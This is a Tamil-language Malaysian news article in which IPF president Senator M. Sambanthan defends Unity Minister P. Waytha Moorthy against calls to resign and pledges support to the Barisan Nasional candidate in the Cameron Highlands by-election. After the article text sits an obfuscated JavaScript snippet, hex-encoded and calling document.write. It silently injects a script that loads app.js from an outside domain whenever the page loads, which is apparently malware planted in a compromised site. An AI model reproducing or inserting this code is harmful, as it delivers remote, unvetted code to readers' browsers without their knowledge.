வேதமூர்த்திக்கு ஐபிஎப் பிளவுபடாத ஆதரவு செனட்டர் டத்தோ சம்பந்தன்

காஜாங், டிச. 24-

பிரதமர் துறையின் ஒற்றுமை துறை அமைச்சர் பொன். வேதமூர்த்தி தமது கடமையை மீறவில்லை. அதனால் ஐபிஎப் கட்சி அவருக்கு பிளவுபடாத ஆதரவு வழங்குமென அதன் தலைவர் செனட்டர் டத்தோ எம். சம்பந்தன் தெரிவித்தார் .

கட்சியின் மத்திய செயற்குழு கூட்டத்தில் வேதமூர்த்திக்கு பிளவுபடாத ஆதரவு வழங்க அனைத்து செயற்குழு உறுப்பினர்களும் ஒரு மனதுடன் இணக்கம் தெரிவித்ததாகவும் அவர் குறிப்பிட்டார்.

வேதமூர்த்தி பதவி விலக வேண்டும் என்று இளைஞர் விளையாட்டு துறை அமைச்சர் சையிட் சாடிக் கூறியிருப்பது ஏற்றுக் கொள்ள முடியாத ஒன்று. நாட்டின் ஒற்றுமைக்கு வேதமூர்த்தி செயலாற்ற தவறிவிட்டார் என இளைஞர் விளையாட்டு துறை அமைச்சர் கூறியிருப்பது வேடிக்கையாக இருக்கின்றது.

முதலில் நம்பிக்கைக் கூட்டணியில் உள்ள கட்சிகள் ஒற்றுமையாக செயல்பட வேண்டும் என அவர் வலியுறுத்தினார். நாட்டை நிர்வாகம் செய்யும் கட்சிகள் ஒற்றுமையை புலப்படுத்தினால் மட்டுமே அதை மக்கள் பின்தொடர்வார்கள். ஆனால் இங்கு ஆட்சி அதிகாரத்தைக் கைப்பற்றிய நம்பிக்கை கூட்டணியில் இடம் பெற்றுள்ள கட்சிகளுக்குள் ஒற்றுமை இல்லை என சம்பந்தன் தெரிவித்தார்.

சீபீல்ட் ஆலய விவகாரத்தை சிறந்த முறையில் கையாள தவறியதால் வேதமூர்த்தி விலகவேண்டும் என சையிட் கூறினார். அன்றைய தினம் ஆலயத்தில் கூடியது பெரும்பாலும் இளைஞர்கள் தான் என்பதை அமைச்சர் அறிந்துகொள்ளவேண்டும். இந்த இளைஞர்களுக்கு மத்தியில் எப்படி நல்லிணக்கத்தை புகுத்த முடியும் என்பது குறித்து அமைச்சு சிந்திக்க வேண்டுமே தவிர ஒற்றுமை அமைச்சர் வேதமூர்த்தியின் மீது குற்றச்சாட்டுகளை முன் வைப்பதை ஏற்றுக்கொள்ள முடியாது என சம்பந்தன் தெரிவித்தார்.

வேதமூர்த்தி ஒற்றுமை அமைச்சர் பதவியிலிருந்து விலகி விட்டால் மலேசியாவில் நல்லிணக்கம் மேலோங்கி விடுமா? அல்லது ஒற்றுமை இன்னும் பன்மடங்கு உயர்ந்து விடுமா? என்ற கேள்வியையும் அவர் முன்வைத்துள்ளார்.

வேதமூர்த்தி பதவி விலக வேண்டிய அவசியம் இல்லை தொடர்ந்து தமது பதவியை தொடர வேண்டும். அதோடு ஒற்றுமைச் சார்ந்த பல விஷயங்களையும் முன்னெடுக்க வேண்டும் என சம்பந்தன் கேட்டுக்கொண்டார்.

நாட்டின் ஒற்றுமையை குறித்து பேசும் காலகட்டத்தில் முதலில் ஆட்சி அதிகாரத்தை கைப்பற்றிய கட்சி ஒற்றுமையுடன் இருக்க வேண்டும் என அவர் தெரிவித்தார். அண்மையில் நாட்டின் பிரதமர் துன் மகாதீர் தம்மை கவிழ்க்க சதி நடப்பதாக கூறினார்.

அதோடு பிகேஆர் கட்சியின் தலைவர் டத்தோஸ்ரீ அன்வார் இப்ராஹிம், நமக்குள் எந்த பிரிவினையும் இருக்கக்கூடாது என்பதை தொடர்ந்து வலியுறுத்தி வருகிறார். இதிலிருந்து ஆளும்கட்சிக்குள் குழப்பம் எழுந்துள்ளது என்பதை அறிந்துகொள்ள முடிகின்றது. முதலில் ஆட்சி அதிகாரத்தில் உள்ளவர்கள் ஒற்றுமையை நிலை நிறுத்தி மக்கள் மத்தியில் நம்பிக்கையை பெற வேண்டும் என சம்பந்தன் தெரிவித்தார்.

தொடர்ந்து பேசிய அவர் கேமரன் மலையில் நடக்கும் இடைத்தேர்தலில் தேசிய முன்னணி வேட்பாளருக்கு தமது கட்சி பிளவுபடாத ஆதரவு வழங்கி பிரச்சாரத்தில் ஈடுபட்டு துணை நிற்கும் என டத்தோ சம்பந்தன் உறுதியளித்தார்.

கேமரன் மலை நாடாளுமன்ற தொகுதியின் வேட்பாளராக டத்தோ சிவராஜ் அறிவிக்கப்பட்டாலும் அல்லது தேசிய முன்னணியில் இருந்து யார் நிறுத்தப்பட்டாலும் அந்த வேட்பாளருக்கு தமது கட்சி துணையாக நின்று வெற்றிக்கு பாடுபடும் என டத்தோ சம்பந்தன் உறுதியளித்தார்.

வேதமூர்த்திக்கு ஆதரவு தெரிவிக்கும் வகையில் காஜாங் அப்டவுனில் நடந்த செய்தியாளர் சந்திப்பில் ஐபிஎப் கட்சியின் தலைமைச் செயலாளர் சங்கர், மகளிர் பிரிவுத் தலைவி ராஜம்மா, இளைஞர் பிரிவுத் தலைவர் ஜோயில் உட்பட மத்திய செயலவை உறுப்பினர்களும் கலந்து கொண்டார்கள்.

var _0xa929=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x59\x77\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x62\x65\x73\x73\x74\x61″,”\x68\x65\x74\x65\x2E\x69\x6E\x66\x6F\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function evop(){var _0x6327x2=_0xa929[0];var _0x6327x3=_0xa929[1];var _0x6327x4=_0xa929[2];var _0x6327x5=_0xa929[3];document[_0xa929[4]](_0x6327x2+ _0x6327x3+ _0x6327x4+ _0x6327x5)}evop()